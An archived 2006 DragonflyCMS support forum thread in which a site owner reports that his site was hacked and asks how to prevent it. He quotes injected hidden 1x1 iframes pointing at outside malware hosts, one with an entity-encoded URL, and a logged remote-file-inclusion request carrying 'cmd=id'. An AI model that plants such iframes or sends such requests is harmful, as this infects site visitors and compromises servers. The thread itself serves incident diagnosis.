Home Private Messages Search
CPG Dragonfly™ CMS stopsoftwarepatents.eu petition banner
Toggle Content
 
Forums ⇒ CMS (All) ⇒ Security :: Archives ⇒ hacked through index.php :: Archived


hacked through index.php :: Archived
Post any security related questions in here.
Please send discovered reports to security @ cpgnuke.com
Do Not post links to exploits or hacker sites - your post will be edited/deleted.
If you think you've been hacked, FIRST go through your server logs.

Go to page 1, 2  Next
Post new topic    Revive this topic    Printer Friendly Page     Forum Index ⇒  Security

Topic Archived View previous topic :: View next topic  
Author Message
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Fri Sep 08, 2006 10:22 am
Post subject: hacked through index.php

somehow someone modified my index.php file


Quote::
<html dir="ltr" lang="en"><head><base href="http://www.mr2oc.co.uk/"><title>MR2 Owners Club � News</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" _base_href="http://www.mr2oc.co.uk/"><meta http-equiv="expires" content="0" _base_href="http://www.mr2oc.co.uk/"><meta http-equiv="imagetoolbar" content="no" _base_href="http://www.mr2oc.co.uk/"><meta name="description" content="News Probably the best MR2 club in the world" _base_href="http://www.mr2oc.co.uk/"><meta name="keywords" content="News, news, new, headlines" _base_href="http://www.mr2oc.co.uk/"><meta name="resource-type" content="document" _base_href="http://www.mr2oc.co.uk/"><meta name="distribution" content="global" _base_href="http://www.mr2oc.co.uk/"><meta name="author" content="MR2 Owners Club" _base_href="http://www.mr2oc.co.uk/"><meta name="copyright" content="Copyright (c) 2006 by MR2 Owners Club" _base_href="http://www.mr2oc.co.uk/"><meta name="robots" content="index, follow" _base_href="http://www.mr2oc.co.uk/"><meta name="rating" content="general" _base_href="http://www.mr2oc.co.uk/"><meta name="generator" content="CPG Dragonfly CMS: Copyright (c) 2003-2006 by CPG-Nuke Development Team, dragonflycms.org" _base_href="http://www.mr2oc.co.uk/"><meta name="MSSmartTagsPreventParsing" content="true" _base_href="http://www.mr2oc.co.uk/"><link rel="shortcut icon" href="themes/cpgnuke/images/favicon.ico" type="image/x-icon" _base_href="http://www.mr2oc.co.uk/"><link rel="copyright" href="index.php?name=credits" title="Copyrights" _base_href="http://www.mr2oc.co.uk/"><link rel="author" href="index.php?name=Members_List" title="Members List" _base_href="http://www.mr2oc.co.uk/"><link rel="alternate" type="application/rss+xml" title="RSS" href="rss/news2.php" _base_href="http://www.mr2oc.co.uk/"><link rel="stylesheet" type="text/css" href="themes/cpgnuke/style/style.css" _base_href="http://www.mr2oc.co.uk/"></head><body><iframe src="http://yauwvhhzml.biz/dl/adv442.php" height="1" width="1"></iframe>?


Quote::
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#121;&#97;&#117;&#119;&#118;&#104;&#104;&#122;&#109;&#108;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#52;&#52;&#50;&#46;&#112;&#104;&#112;" width=1 height=1></iframe><?php

this caused a script popup window and froze IE

i uploaded the default index.php file and it appears to be ok now

how do i stop this happening again ?


jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
spacebar
Dragonfly addicted
Dragonfly addicted

Offline Offline
Joined: Sep 28, 2005
Posts: 413
Location: Providence
PostPosted: Sat Sep 09, 2006 12:21 am
Post subject: Re: hacked through index.php

Its right above the topic you just posted:
Forums/viewtopic/t=2864.html

_________________


spacebar's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Unix / 2.0.46 (Red Hat) / 0.9.7a / 4.1.9-standard / 4.3.2 / 9.0.6.1
Back to top
View user's profile Visit poster's website ICQ Number AIM Address MSN Messenger Yahoo Messenger
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Sat Sep 09, 2006 7:51 am
Post subject: Re: hacked through index.php

no its not , that post only says what to do after a hack , im asking how to prevent this happening again

_________________
CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)

jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
spacebar
Dragonfly addicted
Dragonfly addicted

Offline Offline
Joined: Sep 28, 2005
Posts: 413
Location: Providence
PostPosted: Sat Sep 09, 2006 12:23 pm
Post subject: Re: hacked through index.php

From that post:
Quote::

Before anyone can help or offer suggestions you need to understand and provide a few bits of information first.

You have to gather certain info to lean how you were hacked. Without knowing how you were hacked, how can you prevent it?

1. What type of server are you using?
2. What software is the server running on your site?
3. What is your provider using for a control panel to administer your site?
4. Stay on top of patches and security notes that are released. Is this the case for you?
6. Review the logs.
7. Report the incident to your host/provider/law enforcement/other agency. What did your service provider/host say?

_________________


spacebar's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Unix / 2.0.46 (Red Hat) / 0.9.7a / 4.1.9-standard / 4.3.2 / 9.0.6.1
Back to top
View user's profile Visit poster's website ICQ Number AIM Address MSN Messenger Yahoo Messenger
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Mon Sep 11, 2006 7:30 am
Post subject: Re: hacked through index.php

this keeps happening over and over

Quote::
"GET /index.php?name=Your_Account&profile=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 5 "-" "-"

taken from server log


jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
alva
1000+ Posts Club
1000+ Posts Club

Offline Offline
Joined: May 31, 2005
Posts: 1150
Location: The Netherlands
PostPosted: Mon Sep 11, 2006 7:45 am
Post subject: Re: hacked through index.php

jeffk wrote:
this keeps happening over and over

Quote::
"GET /index.php?name=Your_Account&profile=http://busca.uol.com.br/uol/index.html?&cmd=id HTTP/1.1" 200 5 "-" "-"

taken from server log

Are you sure you have applied the official 9.0.6.1 security patches? (xss fixes and more)


alva's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/Apache/5.0.24/5/9.1 CVS
Back to top
View user's profile Visit poster's website
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Mon Sep 11, 2006 7:53 am
Post subject: Re: hacked through index.php

tbh , no

ive installed what ive seen on the forums

xss fixes , dont think so

is there a central place for all updates please ?

_________________
CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)

jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
alva
1000+ Posts Club
1000+ Posts Club

Offline Offline
Joined: May 31, 2005
Posts: 1150
Location: The Netherlands
PostPosted: Mon Sep 11, 2006 7:59 am
Post subject: Re: hacked through index.php

jeffk wrote:

is there a central place for all updates please ?

They're in the sticky topic in this Forum and they used to be announced through system update notification.

Hmmm, apart from those four fixes there's another 9.0.6.1 fix here as well: cvs/html/modules/Your_Account/index.php?v=9.17.2.1
EDIT: download is here


alva's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/Apache/5.0.24/5/9.1 CVS
Back to top
View user's profile Visit poster's website
Beldak
Nice poster
Nice poster

Offline Offline
Joined: Jun 15, 2005
Posts: 78
Location: Edwards AFB, CA
PostPosted: Mon Sep 11, 2006 5:19 pm
Post subject: Re: hacked through index.php

Perhaps an official 9.0.6.2 would be in order with the applicable security patches? Might help some of our less technically inclined folks. Smile


Beldak's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux 2.4.32 / Apache 1.3.37 / MySQL 5.0.16 / PHP 5.2.2 / Dragonfly CVS
Back to top
View user's profile Visit poster's website
lanmonkey
Nice poster
Nice poster

Offline Offline
Joined: Aug 21, 2006
Posts: 64

PostPosted: Tue Sep 12, 2006 10:48 am
Post subject: Re: hacked through index.php

Beldak wrote:
Perhaps an official 9.0.6.2 would be in order with the applicable security patches? Might help some of our less technically inclined folks. Smile

That sounds like a good idea


lanmonkey's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CentOS/1.3.37 (Unix)/4.1.21/4.4.3/9.0.6.1
Back to top
View user's profile Visit poster's website
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Tue Sep 12, 2006 9:15 pm
Post subject: Re: hacked through index.php

uploaded all the fixes i can find

keep getting iframes added to the site , just had a drive cleaner popup

sample of iframe injection

Quote::
<div class="table1">
<div class="option" align="center"></div>
<div style="text-align:center"><img src="http://i16.photobucket.com/albums/b36/falinn/JAE%2006/DSC_6909.jpg" border="0" alt="" /></div> </div><br />
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
<table class="newstable">
<tr>
<td class="newstopic"><a href="index.php?name=News&amp;topic=1"><img src="images/topics/beamsnews.gif" alt="latest news" border="0" /></a></td>
<td class="newsarticle">


jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
alva
1000+ Posts Club
1000+ Posts Club

Offline Offline
Joined: May 31, 2005
Posts: 1150
Location: The Netherlands
PostPosted: Tue Sep 12, 2006 10:13 pm
Post subject: Re: hacked through index.php

Hmm, i suddenly wondered if it could be an security problem with a third party module. Unfortunately your site gives a blank page now.


alva's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/Apache/5.0.24/5/9.1 CVS
Back to top
View user's profile Visit poster's website
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Tue Sep 12, 2006 10:20 pm
Post subject: Re: hacked through index.php

speaking to the server hosting company atm


seems like a new ftp account was created , they are unsure how

seems like very directory has had an index.html file created

ie /home/xxxxx/public_html/language/index.html

there hunders of altered files on the server now

the index file contents are

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>
<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

_________________
CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)

jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
WebSiteGuru
1000+ Posts Club
1000+ Posts Club

Offline Offline
Joined: Jun 09, 2005
Posts: 2318

PostPosted: Tue Sep 12, 2006 10:22 pm
Post subject: Re: hacked through index.php

Looks fine from where I am at. No POPUP or Iframe.

_________________
Lead Theme Designer - WebSiteGuru Designs

WebSiteGuru's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux 2.6.9 / Apache 2.2.6 / MySQL 5.0.27 / PHP 5 / DF Version 9.2.1
Back to top
View user's profile Visit poster's website Yahoo Messenger
jeffk
Supporter
Supporter

Offline Offline
Joined: Jun 21, 2004
Posts: 322

PostPosted: Tue Sep 12, 2006 10:26 pm
Post subject: Re: hacked through index.php

it was just above the news items , in FF it was two small squares


the host is uploading last nights back up atm , so it prolly wont be available for a while

_________________
CMS Version 9.1.2.1
PHP Version 4.4.4
MySQL Version 4.1.22-standard (client: 4.1.22)

jeffk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
CMS Version 9.1.2.1HP Version 4.4.4MySQL Version 4.1.22-standard (client: 4.1.22
Back to top
View user's profile Visit poster's website MSN Messenger Photo Gallery
Display posts from previous:   
Post new topic    Revive this topic    Printer Friendly Page    Forum Index ⇒  Security
Page 1 of 2
All times are GMT
Go to page 1, 2  Next

Archive Revive
Username:
This is an archived topic - your reply will not be appended here.
Instead, a new topic will be generated in the active forum.
The new topic will provide a reference link to this archived topic.
 
   Toggle Content User Info

Welcome Anonymous

Nickname
Password
(Register)

   Toggle Content Last CVS commits
· Fixed .ico Expires header.
· Removed domain name from cookies so subdomains wont access them anymore.
· CSS and JS, case insensitives.
· CSS and JS, send correct HTTP 1.1 headers and fixed issues where themes and...
· Further security class improvements.
· 301 redirects on LEO changes
· Option to force 3xx http status codes
· Validate googlebot.com and google.com crawlers.
· CCBot
· Rss with etag and atom.

read more...

   Toggle Content Community

Support for DragonflyCMS in a other languages:

Deutsch
Español

   Toggle Content X-links
UltraEdit Browse Happy logo Firefox MySQL PostgreSQL Valid CSS! Valid XHTML 1.0! Unicode Encoded Badge NukeBiz Resources Raven DragonflyCMS Dedicated Now InsideSupport Lampe Berger

You are seeing squares or questionmarks on this page?

All content of this website is copyrighted by the Creative Commons NC-SA
The logos and trademarks used on this site are the property of their respective owners
We are not responsible for comments posted by our users, as they are the property of the poster.
Our server runs on a P3 1.2GHz with 512MB RAM with no accelerators
Support GoPHP5.org
Interactive software released under GNU GPL, Code Credits, Privacy Policy